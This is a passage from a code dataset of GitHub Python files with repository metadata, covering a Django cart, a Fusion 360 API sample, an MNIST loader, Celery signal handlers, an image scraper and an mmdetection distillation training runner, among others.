\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n#e= Entry(root, width= 100, borderwidth= 5)\n#e.pack()\n#question_1= \"There's a hippo coming up out of the water. What should you do?:\\nA)Scream for help\\nB)Run and hide\\nC)Stay as still as possible\\nD)Fight it\\n\"\n#e.insert(0,question_1)\n\n\n#def next_click():\n #question= Label(root, text = e.get())\n #question.pack()\n \n#myLabel1= Label(root, text = \"hello world\").grid(row= 0, column= 0)\n#myLabel2 = Label(root, text= \"my name is janai\").grid(row=1, column= 0)\n#next_button= Button(root, text= \"Next\", padx= 5, pady= 5, command= next_click)\n#next_button.pack()\n\n#myLabel1.grid(row= 0, column= 0)\n#myLabel2.grid(row=1, column= 0)\n\n#root.mainloop()","repo_name":"ksu-is/Can-You-Survive-Jumanji-Quiz","sub_path":"tkinter testing.py","file_name":"tkinter testing.py","file_ext":"py","file_size_in_byte":4281,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"32521259054","text":"from django.shortcuts import get_object_or_404\nfrom ecommerce.models import Product\n\ndef cart_contents(request):\n \"\"\"\n Allows contents of cart to be displayed on any page of app\n \"\"\"\n \n cart = request.session.get('cart', {})\n \n cart_items = []\n total = 0\n product_count = 0\n for id, quantity in cart.items(): \n product = get_object_or_404(Product, pk=id)\n total += quantity * product.tribute\n product_count += quantity\n cart_items.append({'id': id, 'quantity': quantity, 'product': product})\n \n return {'cart_items': cart_items, 'total': total, 'product_count': product_count }","repo_name":"sarahcrosby/project-five-django","sub_path":"cart/contexts.py","file_name":"contexts.py","file_ext":"py","file_size_in_byte":645,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"43"} +{"seq_id":"8350409236","text":"#Author-Autodesk Inc.\n#Description-Demonstrates creating save a new file and then inserting it into a design\n\n\nimport adsk.core, adsk.fusion, adsk.cam, traceback\n\n# Global variable used to maintain a reference to all event handlers.\nhandlers = []\n\n_app = adsk.core.Application.get()\n_ui = _app.userInterface\n\nnewFilename = 'SampleSave'\n_docId = ''\n\ndef run(context):\n try:\n # Check that the active document has been saved.\n doc = _app.activeDocument\n if not doc.isSaved:\n _ui.messageBox('The active document must be saved before running this script.')\n return\n\n parentFolder = doc.dataFile.parentFolder\n\n # Connect to the dataFileComplete event, to watch for when the file has been fully saved on Fusion Team.\n onDataFileComplete = MyDataFileCompleteHandler()\n _app.dataFileComplete.add(onDataFileComplete)\n handlers.append(onDataFileComplete)\n\n # Create a new design with a cylinder.\n newDoc = CreateCylinderDesign(parentFolder, newFilename)\n\n adsk.autoTerminate(False)\n except:\n _ui.messageBox('Failed:\\n{}'.format(traceback.format_exc()))\n\n\n# Event handler for the dataFileComplete event.\nclass MyDataFileCompleteHandler(adsk.core.DataEventHandler):\n def __init__(self):\n super().__init__()\n def notify(self, args: adsk.core.DataEventArgs):\n try:\n # Check to see if the document we care about is the one that saved.\n if args.file.name == newFilename:\n cylinderDoc = args.file\n \n topDoc = _app.activeDocument\n\n # Insert the saved document into the activate document.\n des: adsk.fusion.Design = topDoc.products.itemByProductType('DesignProductType')\n root = des.rootComponent\n\n cylOcc = root.occurrences.addByInsert(args.file, adsk.core.Matrix3D.create(), True)\n\n adsk.terminate()\n except:\n _ui.messageBox('Failed:\\n{}'.format(traceback.format_exc()))\n \n\ndef CreateCylinderDesign(folder, filename):\n try:\n # Create a new document and have it be invisible.\n cylinderDoc: adsk.fusion.FusionDocument = _app.documents.add(adsk.core.DocumentTypes.FusionDesignDocumentType, True)\n\n # Get the Design and root component from the document.\n des: adsk.fusion.Design = cylinderDoc.products.itemByProductType('DesignProductType')\n root = des.rootComponent\n\n # Create a sketch with a single circle.\n sk: adsk.fusion.Sketch = root.sketches.add(root.yZConstructionPlane)\n sk.sketchCurves.sketchCircles.addByCenterRadius(adsk.core.Point3D.create(3,2,0), 4)\n prof = sk.profiles[0]\n\n # Create an extrusion, using the circle.\n root.features.extrudeFeatures.addSimple(prof, adsk.core.ValueInput.createByReal(12), adsk.fusion.FeatureOperations.NewBodyFeatureOperation)\n\n # Save the document.\n cylinderDoc.saveAs(filename, folder, 'Sample demonstrating watching for the save to complete.', '')\n\n global _docId\n _docId = cylinderDoc.creationId\n cylinderDoc.close(False)\n except:\n _ui.messageBox('Failed:\\n{}'.format(traceback.format_exc()))","repo_name":"JeromeBriot/fusion360-offline-api-samples","sub_path":"Python/General/Miscellaneous/SaveAndInsertFileApiSample/SaveAndInsertFileApiSample.py","file_name":"SaveAndInsertFileApiSample.py","file_ext":"py","file_size_in_byte":3243,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"5848585578","text":"import pyodbc\nDBfile='D:/QtTest/NounDicWithDb/NounLib.mdb'\nconn = pyodbc.connect('DRIVER={Microsoft Access Driver (*.mdb)};DBQ='+DBfile)\ncursor=conn.cursor()\nfrom lxml import etree\ncursor.execute('select * from Result')\nLs=cursor.fetchall()\nLs.sort(key=lambda x:x[1])\nroot=etree.Element('WordList')\nj=0;\nroot.append(etree.Element('WordGroup'))\nfor\ti\tin range(len(Ls)):\n\t\t\t\tk=etree.Element('word')\n\t\t\t\tif(Ls[i][4]):\n\t\t\t\t\tk.set('Property',Ls[i][4]);\n\t\t\t\tk.set('Level',str(Ls[i][5]));\n\t\t\t\tk.append(etree.Element('description'))\n\t\t\t\tk.append(etree.Element('wordform'))\n\t\t\t\tk[1].append(etree.Element('or'))\n\t\t\t\tk[1][0].text=Ls[i][0]\n\t\t\t\tk[1].append(etree.Element('reflectiveChange'))\n\t\t\t\tif(Ls[i][6]):\n\t\t\t\t\tk[1][1].text=Ls[i][6]\n\t\t\t\telse:\n\t\t\t\t\tk[1][1].text=''\n\t\t\t\tk.append(etree.Element('TE'))\n\t\t\t\tk[2].text=Ls[i][3]\n\t\t\t\troot[j].append(k)\n\t\t\t\tif(i==len(Ls)-1):\n\t\t\t\t\tcontinue;\n\t\t\t\tif(abs(Ls[i][1]-Ls[i+1][1])<0.5):\n\t\t\t\t\tcontinue;\n\t\t\t\texample=etree.Element('example')\n\t\t\t\texample.text=Ls[i][2]\n\t\t\t\troot[j].append(example)\n\t\t\t\tj+=1\n\t\t\t\troot.append(etree.Element('WordGroup'))\n##a=['Tor','Torte','Tourist',u'T\\xfcr','Vermieterin']\n##for i in range(0,5):\n## cursor.execute(u\"select * from Noun where wordform='{0}'\".format(a[i]))\n## result=cursor.fetchall()\n## f=open('D:/ProjectNote/GermaData/DicTest/Format.xml','rb')\n## st=f.read()\n## st=st.replace('',a[i].encode('utf-8')+'')\n## st=st.replace('',str(result[0][-3])+'')\n## st=st.replace('',result[0][-2].encode('utf-8')+'')\n## st=st.replace('',result[0][2].encode('utf-8')+'')\n## st=st.replace('',result[0][3].encode('utf-8')+'')\n## st=st.replace('',result[0][5].encode('utf-8')+'')\n## st=st.replace('',result[0][6].encode('utf-8')+'')\n## f=open('D:/ProjectNote/GermaData/DicTest/Wort/%d.xml'%(i+261),'wb')\n## f.write(st)\n## f.close()\n#print etree.tostring(root,encoding='utf-8',pretty_print=True)\nf=open('D:/ProjectNote/GermaData/KlickAufDeutschEins/VokabelnText.xml','wb')\nf.write(''+etree.tostring(root,encoding='utf-8',pretty_print=True))\nf.close()\n##for i in root:\n##\tif(len(i)>1):\n##\t\tprint i[0][1]\n","repo_name":"zhaofeng-shu33/tech-chores-archive","sub_path":"2016/ProjectNote/PyTest/DataBaseProcessing.py","file_name":"DataBaseProcessing.py","file_ext":"py","file_size_in_byte":2272,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"16849991556","text":"#!/usr/bin/env python3\nfrom student.all import get_all_info, return_json_all\nfrom student.get_info import get_student_info, return_json_info\nfrom student.grade import get_grade, return_json_grade\nfrom student.schedule import get_schedule, return_json_schedule\n\n\n# 这些是路由函数\ndef route(do, student, login_session, now_url, login_soup, send_header, jud, err_info):\n # 当执行的操作为获取当前用户信息时\n if do == \"info\":\n if jud:\n return get_student_info(student, login_session, now_url, login_soup, send_header)\n else:\n return return_json_info(jud, err_info, \"\", \"\", \"\", \"\", \"\", \"\", \"\", \"\", \"\")\n elif do == \"all\":\n if jud:\n return get_all_info(student, login_session, now_url, login_soup, send_header)\n else:\n return return_json_all(jud, err_info, None, None, None)\n else:\n if do == \"schedule\":\n if jud:\n return get_schedule(login_session, now_url, login_soup, send_header)\n else:\n return return_json_schedule(False, \"\", [])\n elif do == \"grade\":\n if jud:\n return get_grade(login_session, now_url, login_soup, send_header)\n else:\n return return_json_grade(False, \"\", [])\n","repo_name":"czarhao/sync_crawler","sub_path":"route.py","file_name":"route.py","file_ext":"py","file_size_in_byte":1296,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"43"} +{"seq_id":"23831542153","text":"import gzip\nimport logging\nimport os\nimport struct\n\nimport numpy as np\n\nIMAGE_WIDTH = 28\nIMAGE_HEIGHT = 28\n\nIDX_DATA_TYPE_U8 = 0x8\nIDX_DATA_TYPE_S8 = 0x9\nIDX_DATA_TYPE_I16 = 0xb\nIDX_DATA_TYPE_I32 = 0xc\nIDX_DATA_TYPE_F32 = 0xd\nIDX_DATA_TYPE_F64 = 0xe\n\ndef load(name, folder=None):\n if not folder:\n folder = os.path.join(os.path.dirname(os.path.dirname(os.path.abspath(__file__))), \"mnist_data\")\n\n images = load_images(os.path.join(folder, name + \"-images-idx3-ubyte.gz\"))\n labels = load_labels(os.path.join(folder, name + \"-labels-idx1-ubyte.gz\"))\n return zip(images, labels)\n\ndef load_images(file_name):\n fh = gzip.open(file_name, \"rb\")\n (data_type, dimensions) = read_idx_file(file_name, fh)\n assert data_type == IDX_DATA_TYPE_U8, \"invalid data type(%x) from file '%s'\" % (data_type,\n file_name)\n assert len(dimensions) == 3, \"invalid # of dimensions(%d != 3) from file '%s'\" % (\n len(dimensions), file_name)\n assert dimensions[1] == 28 and dimensions[2] == 28, \\\n \"invalid image size(%dx%d != 28x28) from file '%s'\" % (dimensions[1], dimensions[2],\n file_name)\n num_images = dimensions[0]\n images = [None] * num_images\n for i in xrange(num_images):\n data = map(lambda x: x/256.0, bytearray(fh.read(28*28)))\n images[i] = np.array(data, dtype=np.float32, ndmin=2).transpose()\n fh.close()\n return images\n\ndef load_labels(file_name):\n fh = gzip.open(file_name, \"rb\")\n (data_type, dimensions) = read_idx_file(file_name, fh)\n assert data_type == IDX_DATA_TYPE_U8, \"invalid data type(%x) from file '%s'\" % (data_type,\n file_name)\n assert len(dimensions) == 1, \"invalid # of dimensions(%d != 1) from file '%s'\" % (\n len(dimensions), file_name)\n num_labels = dimensions[0]\n labels = [-1] * num_labels\n for i in xrange(num_labels):\n labels[i] = struct.unpack('B', fh.read(1))[0]\n fh.close()\n return labels\n\ndef read_idx_file(file_name, fh):\n magic = struct.unpack(\">i\", fh.read(4))[0]\n assert (magic & 0xffff0000) == 0, \"invalid magic number(%x) from file '%s'\" % (magic, file_name)\n data_type = (magic >> 8)\n n = (magic & 0xff)\n dimensions = [0] * n\n for i in xrange(n):\n dimensions[i] = struct.unpack(\">i\", fh.read(4))[0]\n return (data_type, dimensions)\n","repo_name":"YijinLiu/deep-learning","sub_path":"py/mnist.py","file_name":"mnist.py","file_ext":"py","file_size_in_byte":2347,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"36940140887","text":"import logging\nfrom datetime import datetime\n\nfrom django.conf import settings\nfrom celery.signals import beat_init, celeryd_init, task_internal_error, import_modules\n\nfrom .utils import autodiscover_tasks\n\nlogger = logging.getLogger(\"celery.worker\")\n\n\n@celeryd_init.connect\ndef load_worker(sender, instance, conf, options, **kwargs):\n logging.warning(\"Sender<%s> instance: %s, conf: %s, options: %s\", sender, instance, conf, options)\n\n if not conf.result_backend:\n logger.warning(\"Setting `result_backend` is strongly recommended.\")\n\n from django_celery_beat.models import PeriodicTask\n from django_celery_jobs.jobScheduler.trigger.cron import CronTrigger\n from django_celery_jobs.tasks.task_synchronous_jobs import sync_celery_native_tasks\n\n sync_celery_native_tasks()\n\n # Pause: Auto sync celery task to database\n if getattr(settings, ' DJANGO_CELERY_NATIVE_TASK_SYNC', False):\n trigger = CronTrigger.from_crontab('*/5 * * * *') # Every 5 minute\n crontab_id = trigger.get_trigger_schedule()['crontab_id']\n\n name = sync_celery_native_tasks.name\n beat_task = PeriodicTask.objects.filter(task=name, enabled=True).first()\n\n if not beat_task:\n PeriodicTask.objects.create(name=name, task=name, crontab_id=crontab_id)\n\n\n@beat_init.connect\ndef load_beat(sender, **kwargs):\n logging.warning('BeatScheduler must be injected first, now: %s', datetime.now())\n logging.warning('BeatScheduler => sender: %s, kwargs: %s', sender, kwargs)\n\n from django_celery_beat.models import PeriodicTask\n from django_celery_jobs.jobScheduler.trigger.cron import CronTrigger\n from django_celery_jobs.tasks.task_synchronous_jobs import watch_periodic_tasks\n\n trigger = CronTrigger.from_crontab('* * * * *')\n PeriodicTask.objects.get_or_create(\n name=watch_periodic_tasks.name, task=watch_periodic_tasks.name,\n crontab_id=trigger.get_trigger_schedule()['crontab_id'], enabled=True,\n )\n\n\n@import_modules.connect\ndef discover_tasks(sender, **kwargs):\n logging.warning('discover_tasks => sender: %s, kwargs: %s, now: %s', sender, kwargs, datetime.now())\n\n autodiscover_tasks()\n\n\n@task_internal_error.connect\ndef handle_task_internal_error(sender, task_id, args, kwargs, request, einfo, **kw):\n \"\"\" Handle errors in tasks by signal, that is not internal logic error in task func code.\n Because the result of a failed task execution is stored in result_backend\n \"\"\"\n logging.warning(\"Handle task err => sender<%s> was error: %s at task<%s>\", sender, einfo, task_id)\n logger.error(\"TaskId: %s, args: %s, kwargs: %s, request: %s\", task_id, args, kwargs, request)\n","repo_name":"luojidr/django-celery-jobs","sub_path":"django_celery_jobs/jobScheduler/core/celery/registry.py","file_name":"registry.py","file_ext":"py","file_size_in_byte":2670,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"43"} +{"seq_id":"74784613568","text":"import requests \nfrom bs4 import BeautifulSoup as bs\nimport re\nimport os \n\n\n\ndef get_images(url):\n\ttry:\n\t\tr = requests.get(url)\n\texcept requests.exceptions.RequestException as e:\n\t\tprint('Invalid URL')\n\t\treturn False\n\n\twebpage = bs(r.content, features=\"html.parser\")\t \n\timage_urls = [x['href'] for x in webpage.select(\"div[id='30darchive'] a[class=wcg-archive]\")]\n\n\tfor i in image_urls:\n\t\timg_data = requests.get(i).content\n\t\tpattern = \"oneyear/(.*?).jpg\"\n\t\tname = re.search(pattern, i).group(1)[6:] + '-' + re.search(pattern, i).group(1)[:5] \n\t\twith open(path + name + '.jpg', 'wb') as handler:\n\t\t\thandler.write(img_data)\n\treturn True\n\n\n\ndef get_urls(url):\n\ttry:\n\t\tr = requests.get(url)\n\texcept requests.exceptions.RequestException as e:\n\t\tprint('Invalid URL')\n\t\treturn False\n\n\twebpage = bs(r.content, features=\"html.parser\")\t \n\thyperlinks = [x['href'] for x in webpage.select(\"div[class='wcg-border wcg-box-mobile'] a\") if not 'complete' in x['href']]\n\n\tfor h in hyperlinks:\n\t\tget_images(h)\n\n\treturn True\n\n\n\npath = os.getcwd() + '..\\\\..\\\\..\\\\images\\\\'\n\ntry:\n os.mkdir(path)\nexcept OSError:\n pass\n\n\nurl = ''\nwhile True:\n\turl = input(\"URL: \")\n\tif url == 'exit':\n\t\tbreak\n\telse:\n\t\tget_urls(url)","repo_name":"JakubDmochowski/ZZSN_joint_repos","sub_path":"image_downloaders/python/get_images.py","file_name":"get_images.py","file_ext":"py","file_size_in_byte":1204,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"70049922690","text":"class Solution(object):\n def intersection(self, nums1, nums2):\n \"\"\"\n :type nums1: List[int]\n :type nums2: List[int]\n :rtype: List[int]\n \"\"\"\n dict1 = {num : 0 for num in nums1}\n dict2 = {num : 0 for num in nums2}\n return [key for key in dict1.keys() if dict2.setdefault(key, 1) == 0]\n","repo_name":"ccbrantley/LeetCode","sub_path":"349-IntersectionOfTwoArrays/IntersectionofTwoArrays.py","file_name":"IntersectionofTwoArrays.py","file_ext":"py","file_size_in_byte":342,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"37407081843","text":"# Without logging in to the amazon account search a product and click to the first result\nimport time\nimport unittest\nfrom selenium import webdriver\nfrom sources.navigationBar import NavigationBar\nfrom sources.searchResultPage import SearchResult\n\n\n\nclass TestCase(unittest.TestCase):\n def setUp(self) -> None:\n self.driver = webdriver.Chrome()\n self.driver.delete_all_cookies()\n self.driver.maximize_window()\n self.driver.get(\"https://www.amazon.com/\")\n\n def test_search(self):\n self.navigationBar = NavigationBar(self.driver)\n self.navigationBar.fill_search_field(\"python books\")\n self.navigationBar.press_to_search_button()\n\n\n self.searchResult = SearchResult(self.driver)\n self.searchResult.press_to_first_product()\n\n def tearDown(self) -> None:\n self.driver.close()\n","repo_name":"Tsoghik31/Tsoghik_POM_Homework","sub_path":"tests/SearchResultTest.py","file_name":"SearchResultTest.py","file_ext":"py","file_size_in_byte":850,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"43"} +{"seq_id":"693084905","text":"# My own task decorator\n\ndef print_task(task_no):\n def decorator_task(func_task):\n def wrapper_task(*args):\n print(f'{\"̅\" * 20} {task_no} TASK {\"̅\" * 20}')\n func_task(*args)\n print(f'{\"̅\" * 50}')\n\n return wrapper_task\n\n return decorator_task\n\n\n# Лексикографическое возрастание*\n# На вход подаётся некоторое количество (не больше сотни) разделённых пробелом целых чисел\n# (каждое не меньше 0 и не больше 19).\n# Выведите их через пробел в порядке лексикографического возрастания названий этих чисел в английском языке.\n# Т.е., скажем числа 1, 2, 3 должны быть выведены в порядке 1, 3, 2,\n# поскольку слово two в словаре встречается позже слова three, а слово three -- позже слова one\n# (иначе говоря, поскольку выражение 'one' < 'three' < 'two' является истинным)\n#\n\n\n@print_task('THIRD')\ndef func():\n number_names = \\\n {\n 0: 'zero', 1: 'one', 2: 'two', 3: 'three', 4: 'four', 5: 'five', 6: 'six', 7: 'seven', 8: 'eight',\n 9: 'nine',\n 10: 'ten', 11: 'eleven', 12: 'twelve',\n 13: 'thirteen', 14: 'fourteen', 15: 'fifteen', 16: 'sixteen', 17: 'seventeen', 18: 'eighteen',\n 19: 'nineteen'\n }\n input_num = list(map(str, input('Enter numbers by space: ').split()))\n\n sorted_dict = {}\n sorted_keys = sorted(number_names, key=number_names.get)\n\n for v in sorted_keys:\n sorted_dict[v] = number_names[v]\n\n new_one = {}\n for k, v in sorted_dict.items():\n if str(k) in input_num:\n new_one[k] = v\n print(\"Sorted result:\")\n for key in new_one.keys():\n print(key, end=' ')\n print()\n\n\nfunc()\n","repo_name":"AlekseyQty/qap09-onl","sub_path":"vajda_maksim_valerevich/hm_8/homework_8_3.py","file_name":"homework_8_3.py","file_ext":"py","file_size_in_byte":2024,"program_lang":"python","lang":"ru","doc_type":"code","stars":5,"dataset":"github-code","pt":"43"} +{"seq_id":"7008454431","text":"from typing import List\n\nfrom cirro.api.models.project import Project\nfrom cirro.cli.interactive.utils import ask\n\n\ndef ask_project(projects: List[Project], input_value: str) -> str:\n project_names = sorted([project.name for project in projects])\n if len(project_names) <= 10:\n return ask(\n 'select',\n 'What project is this dataset associated with?',\n choices=project_names,\n default=input_value if input_value in project_names else None\n )\n else:\n return ask(\n 'autocomplete',\n 'What project is this dataset associated with? (use TAB to display options)',\n choices=project_names,\n default=input_value if input_value in project_names else ''\n )\n","repo_name":"CirroBio/Cirro-client","sub_path":"cirro/cli/interactive/common_args.py","file_name":"common_args.py","file_ext":"py","file_size_in_byte":770,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"43"} +{"seq_id":"29501540373","text":"from autoinvoice import configs\nfrom autoinvoice.common import pure_virtual\n\n\nclass ICompanyRegister:\n def __init__(self):\n self.verbose = configs.config.getboolean('Options', 'verbose', fallback=False)\n\n @pure_virtual\n def getRecords(self, TaxPayerId, url, key) -> []:\n \"\"\"\n Return vector with dictionaries related to single tax payer id\n \"\"\"\n return [self.buildRecord(...)]\n\n def buildRecord(self, taxpayerid, regon, customername, state, address, postcode, city, refere) -> dict:\n if not isinstance(taxpayerid, str):\n raise ValueError('taxpayerid is not str, {}'.format(type(taxpayerid)))\n if not isinstance(regon, str):\n raise ValueError('regon is not str, {}'.format(type(regon)))\n if not isinstance(customername, str):\n raise ValueError('name is not str, {}'.format(type(customername)))\n if not isinstance(state, str):\n raise ValueError('state is not str, {}'.format(type(state)))\n if not isinstance(address, str):\n raise ValueError('address is not str, {}'.format(type(address)))\n if not isinstance(postcode, str):\n raise ValueError('postcode is not str, {}'.format(type(postcode)))\n if not isinstance(city, str):\n raise ValueError('city is not str, {}'.format(type(city)))\n if not isinstance(refere, str):\n raise ValueError('refere is not str, {}'.format(type(refere)))\n return {\n 'taxpayerid' : taxpayerid,\n 'regon' : regon,\n 'customername' : customername,\n 'state' : state,\n 'address' : address,\n 'postcode' : postcode,\n 'city' : city,\n 'refere' : refere\n }\n\n def recordToRefere(self, record) -> dict:\n \"\"\"\n Takes as input database record\n \"\"\"\n if self.verbose:\n print(record)\n\n return {\n 'ref_taxpayerid' : record['taxpayerid'],\n 'ref_regon' : record['regon'],\n 'ref_companyname' : record['customername'],\n 'ref_state' : record['state'],\n 'ref_address' : record['address'],\n 'ref_postcode' : record['postcode'],\n 'ref_city' : record['city'],\n 'ref_refere' : record['refere'],\n }\n\n\n@pure_virtual\ndef get():\n return ICompanyRegister","repo_name":"str0g/autoinvoice","sub_path":"autoinvoice/mod_company_register/plugins/iface.py","file_name":"iface.py","file_ext":"py","file_size_in_byte":2460,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"17675560663","text":"import os.path as osp\nimport platform\nimport shutil\nimport time\nimport warnings\n\nimport torch\nfrom torchvision.utils import save_image \n\nimport mmcv\nfrom .base_runner_feat_cls_loc import BaseRunnerFeatClsLoc\nfrom mmcv.runner.builder import RUNNERS\nfrom mmcv.runner.checkpoint import save_checkpoint\nfrom mmcv.runner.utils import get_host_info\nimport torch.nn.functional as F\n\n\ndef get_info_t(data_batch, teacher, cfg):\n \"\"\"\n get the logits from the classification teacher for KD_cls \n \"\"\"\n teacher.eval()\n boxes_list = data_batch['gt_bboxes'].data[0]\n images = data_batch['img'].data[0]\n height, width = images.size(2), images.size(3)\n nobj = [0]\n img_cls = []\n\n for (ni, img) in enumerate(images):\n input_img= img.unsqueeze(0).cuda()\n box_list = boxes_list[ni].cuda() \n nobj.append(nobj[ni]+box_list.size(0)) \n if box_list.size(0) < 1:\n continue\n left = torch.clamp(box_list[ :, 0], min=0)\n bottom = torch.clamp(box_list[:, 1], min=0)\n right = torch.clamp(box_list[:, 2], max=width)\n top = torch.clamp(box_list[:, 3], max=height)\n\n theta = torch.zeros((box_list.size(0), 2, 3), dtype=torch.float).cuda()\n theta[:, 0, 0] = (right-left)/width\n theta[:, 1, 1] = (top-bottom)/height\n \n theta[:, 0, 2] = -1. + (left + (right-left)/2)/(width/2)\n theta[:, 1, 2] = -1. + ((bottom + (top-bottom)/2))/(height/2)\n \n grid_size = torch.Size((box_list.size(0), input_img.size(1), cfg.object_size, cfg.object_size))\n grid = F.affine_grid(theta, grid_size, align_corners=False) \n img_ = F.grid_sample(torch.cat(box_list.size(0)*[input_img]), grid, align_corners=False) \n img_cls.append(img_)\n\n imgs_cls = torch.cat(img_cls, dim=0)\n with torch.no_grad():\n logit_t_ = teacher(imgs_cls).cpu()\n \n for i in range(images.size(0)): \n if nobj[i] == nobj[i+1]:\n logits_t = [] ## something for no objects\n else:\n logits_t = [logit_t_[nobj[i]:nobj[i+1]]]\n data_batch['img_metas'].data[0][i].update({'gt_logits_t': logits_t})\n\n return data_batch \n\n@RUNNERS.register_module()\nclass EpochBasedRunnerFeatClsLoc(BaseRunnerFeatClsLoc):\n \"\"\"Epoch-based Runner.\n\n This runner train models epoch by epoch.\n \"\"\"\n def run_iter(self, data_batch, train_mode, **kwargs):\n if self.batch_processor is not None:\n outputs = self.batch_processor(\n self.model, data_batch, train_mode=train_mode, **kwargs)\n elif train_mode:\n outputs = self.model.train_step(data_batch, self.optimizer,\n **kwargs)\n else:\n outputs = self.model.val_step(data_batch, self.optimizer, **kwargs)\n if not isinstance(outputs, dict):\n raise TypeError('\"batch_processor()\" or \"model.train_step()\"'\n 'and \"model.val_step()\" must return a dict')\n if 'log_vars' in outputs:\n self.log_buffer.update(outputs['log_vars'], outputs['num_samples'])\n self.outputs = outputs\n\n def train(self, data_loader, **kwargs):\n self.model.train()\n if self.teacher_det is not None:\n self.teacher_det.train()\n if self.teacher_cls is not None:\n self.teacher_cls.eval()\n self.mode = 'train'\n self.data_loader = data_loader\n self._max_iters = self._max_epochs * len(self.data_loader)\n\n self.call_hook('before_train_epoch')\n time.sleep(2) # Prevent possible deadlock during epoch transition\n for i, data_batch in enumerate(self.data_loader):\n self._inner_iter = i\n self.call_hook('before_train_iter')\n # update data_batch \n if self.batch_processor is None:\n if self.teacher_det is not None:\n with torch.no_grad():\n t_info = self.teacher_det.train_step(data_batch, self.optimizer, epoch=self.epoch,\n iter=self._inner_iter, teach=True, t_info=None,\n **kwargs)\n else:\n t_info = None\n if self.teacher_cls is not None:\n data_batch = get_info_t(data_batch, self.teacher_cls, self.model.module.kt_cfg.cfg_t)\n\n outputs = self.model.train_step(data_batch, self.optimizer, epoch=self.epoch,\n iter=self._inner_iter, teach=False, t_info=t_info,\n **kwargs)\n else:\n outputs = self.batch_processor(\n self.model, data_batch, train_mode=True, **kwargs)\n\n if not isinstance(outputs, dict):\n raise TypeError('\"batch_processor()\" or \"model.train_step()\"'\n ' must return a dict')\n if 'log_vars' in outputs:\n self.log_buffer.update(outputs['log_vars'],\n outputs['num_samples'])\n self.outputs = outputs\n self.call_hook('after_train_iter')\n self._iter += 1\n\n self.call_hook('after_train_epoch')\n self._epoch += 1\n \n @torch.no_grad()\n def val(self, data_loader, **kwargs):\n self.model.eval()\n self.mode = 'val'\n self.data_loader = data_loader\n self.call_hook('before_val_epoch')\n time.sleep(2) # Prevent possible deadlock during epoch transition\n for i, data_batch in enumerate(self.data_loader):\n self._inner_iter = i\n self.call_hook('before_val_iter')\n self.run_iter(data_batch, train_mode=False)\n self.call_hook('after_val_iter')\n\n self.call_hook('after_val_epoch')\n\n def run(self, data_loaders, workflow, max_epochs=None, **kwargs):\n \"\"\"Start running.\n\n Args:\n data_loaders (list[:obj:`DataLoader`]): Dataloaders for training\n and validation.\n workflow (list[tuple]): A list of (phase, epochs) to specify the\n running order and epochs. E.g, [('train', 2), ('val', 1)] means\n running 2 epochs for training and 1 epoch for validation,\n iteratively.\n \"\"\"\n assert isinstance(data_loaders, list)\n assert mmcv.is_list_of(workflow, tuple)\n assert len(data_loaders) == len(workflow)\n if max_epochs is not None:\n warnings.warn(\n 'setting max_epochs in run is deprecated, '\n 'please set max_epochs in runner_config', DeprecationWarning)\n self._max_epochs = max_epochs\n\n assert self._max_epochs is not None, (\n 'max_epochs must be specified during instantiation')\n\n for i, flow in enumerate(workflow):\n mode, epochs = flow\n if mode == 'train':\n self._max_iters = self._max_epochs * len(data_loaders[i])\n break\n\n work_dir = self.work_dir if self.work_dir is not None else 'NONE'\n self.logger.info('Start running, host: %s, work_dir: %s',\n get_host_info(), work_dir)\n self.logger.info('workflow: %s, max: %d epochs', workflow,\n self._max_epochs)\n self.call_hook('before_run')\n\n while self.epoch < self._max_epochs:\n for i, flow in enumerate(workflow):\n mode, epochs = flow\n # import ipdb; ipdb.set_trace()\n if isinstance(mode, str): # self.train()\n if not hasattr(self, mode):\n raise ValueError(\n f'runner has no method named \"{mode}\" to run an '\n 'epoch')\n epoch_runner = getattr(self, mode)\n else:\n raise TypeError(\n 'mode in workflow must be a str, but got {}'.format(\n type(mode)))\n\n for _ in range(epochs):\n if mode == 'train' and self.epoch >= self._max_epochs:\n break\n epoch_runner(data_loaders[i], **kwargs)\n\n time.sleep(1) # wait for some hooks like loggers to finish\n self.call_hook('after_run')\n\n def save_checkpoint(self,\n out_dir,\n filename_tmpl='epoch_{}.pth',\n save_optimizer=True,\n meta=None,\n create_symlink=True):\n \"\"\"Save the checkpoint.\n\n Args:\n out_dir (str): The directory that checkpoints are saved.\n filename_tmpl (str, optional): The checkpoint filename template,\n which contains a placeholder for the epoch number.\n Defaults to 'epoch_{}.pth'.\n save_optimizer (bool, optional): Whether to save the optimizer to\n the checkpoint. Defaults to True.\n meta (dict, optional): The meta information to be saved in the\n checkpoint. Defaults to None.\n create_symlink (bool, optional): Whether to create a symlink\n \"latest.pth\" to point to the latest checkpoint.\n Defaults to True.\n \"\"\"\n if meta is None:\n meta = dict(epoch=self.epoch + 1, iter=self.iter)\n elif isinstance(meta, dict):\n meta.update(epoch=self.epoch + 1, iter=self.iter)\n else:\n raise TypeError(\n f'meta should be a dict or None, but got {type(meta)}')\n if self.meta is not None:\n meta.update(self.meta)\n\n filename = filename_tmpl.format(self.epoch + 1)\n filepath = osp.join(out_dir, filename)\n optimizer = self.optimizer if save_optimizer else None\n save_checkpoint(self.model, filepath, optimizer=optimizer, meta=meta)\n # in some environments, `os.symlink` is not supported, you may need to\n # set `create_symlink` to False\n if create_symlink:\n dst_file = osp.join(out_dir, 'latest.pth')\n if platform.system() != 'Windows':\n mmcv.symlink(filename, dst_file)\n else:\n shutil.copy(filepath, dst_file)\n\n@RUNNERS.register_module()\nclass 